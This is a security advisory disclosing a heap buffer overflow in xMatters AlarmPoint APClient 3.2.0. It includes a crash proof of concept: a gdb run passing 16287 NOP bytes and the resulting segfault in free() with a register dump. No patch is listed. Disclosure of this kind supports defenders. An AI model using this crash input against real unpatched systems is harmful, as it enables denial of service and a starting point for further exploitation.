Information -------------------- Name : Heap Buffer Overflow in xMatters AlarmPoint APClient Version: APClient 3.2.0 (native) Software : xMatters AlarmPoint Vendor Homepage : http://www.xmatters.com Vulnerability Type : Heap Buffer Overflow Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin Severity : High Description ------------------ The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint. Details ------------------- AlarmPoint APClient is affected by a Heap Overflow vulnerability in version APClient 3.2.0 (native) A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as the POSIX malloc() call. https://www.owasp.org/index.php/Heap_overflow Exploit as follow: Submit a malicious file cointaining the exploit root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex or (gdb) run `python -c 'print "\x90"*16287'` Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print "\x90"*16287'` Program received signal SIGSEGV, Segmentation fault. 0x0804be8a in free () (gdb) i r eax 0xa303924 170932516 ecx 0xbfb8 49080 edx 0xa303924 170932516 ebx 0x8059438 134583352 esp 0xbfff3620 0xbfff3620 ebp 0xbfff3638 0xbfff3638 esi 0x8059440 134583360 edi 0x80653f0 134632432 eip 0x804be8a 0x804be8a <free+126> eflags 0x210206 [ PF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) Solution ------------------- No patch are available at this time.